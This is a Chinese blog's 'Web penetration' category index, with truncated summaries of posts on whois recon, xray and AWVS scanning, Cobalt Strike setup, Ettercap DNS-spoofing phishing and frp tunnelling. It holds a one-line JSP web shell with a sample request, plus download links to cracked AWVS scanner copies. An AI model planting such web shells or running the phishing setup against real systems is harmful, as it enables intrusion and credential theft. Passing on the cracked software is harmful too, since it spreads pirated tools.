随笔分类 - Web渗透
web渗透测试
摘要:一、域名信息收集 1.获取域名的whois信息是、 什么是Whois Whois是一种传输协议,用于查询域名注册所有者等信息。它可以帮助您查询域名是否已被注册,以及获取有关已注册域名的详细信息,例如域名注册商和域名所有人。 早期的Whois查询通常使用命令行接口。现在,一些网页接口简化了在线查询工具
阅读全文
摘要:#一、无回显的命令执行(命令执行后不会在前端页面返回数据) <%Runtime.getRuntime().exec(request.getParameter("i"));%> ###请求url:http://127.0.0.1/shell.jsp?i=whoami #二、有回显带密码的命令执行(命令
阅读全文
摘要:#AWVS13_windows破解版:链接:https://pan.baidu.com/s/1qeGiNubhWgY6oeMx_IkMtg 提取码:2i2o #AWVS13_linux破解版:链接:https://pan.baidu.com/s/1Svp02GzKAwnclT-UgFSR8Q 提取码
阅读全文
摘要:#前言:xray是一款强大的漏扫工具,配合awvs的爬站功能可以十分轻松实现全自动挖洞,这里awvs我是使用的是12版本 ##1、启动xray,监听本地指定端口,这里我监听的是2222端口 ###命令:xray_windows_amd64.exe webscan --listen 0.0.0.0:2
阅读全文
摘要:一、前言: 当你兴高采烈的买了一台云服务器,迫不及待地想去搭建传说中的神器cobalt strike的时候,你可能会遇到以下的一些小问题,这里我会列出对应的解决方法。 二、遇到的一些小问题 ##1、上传文件 将本机上的一些工具上传到服务器,你得用到xshell这个工具,在xshell里连接服务器,命
阅读全文
摘要:#前言:攻击机(kali)和受害机(win7)需在同一网段下 ##1、首先创建一个钓鱼克隆网站,这里我就利用CS来弄了 ##2、对Ettercap的dns文件进行编辑 ##3、开启ettercap ##4、去受害机看看攻击效果 ##5、获取钓鱼获取的账号密码 ###通过ettercap获取账号密码
阅读全文
摘要:#前言:我们常用的kali系统一般都是在虚拟机里面运行,这样在真实环境中外网是访问不到你的kali攻击机的,这时候我们就需要给kali映射一个外网vps。 ##一、在vps启动frp 服务端 安装frp并解压,然后进入frp文件夹配置服务端文件 wget https://github.com/fat
阅读全文
浙公网安备 33010602011771号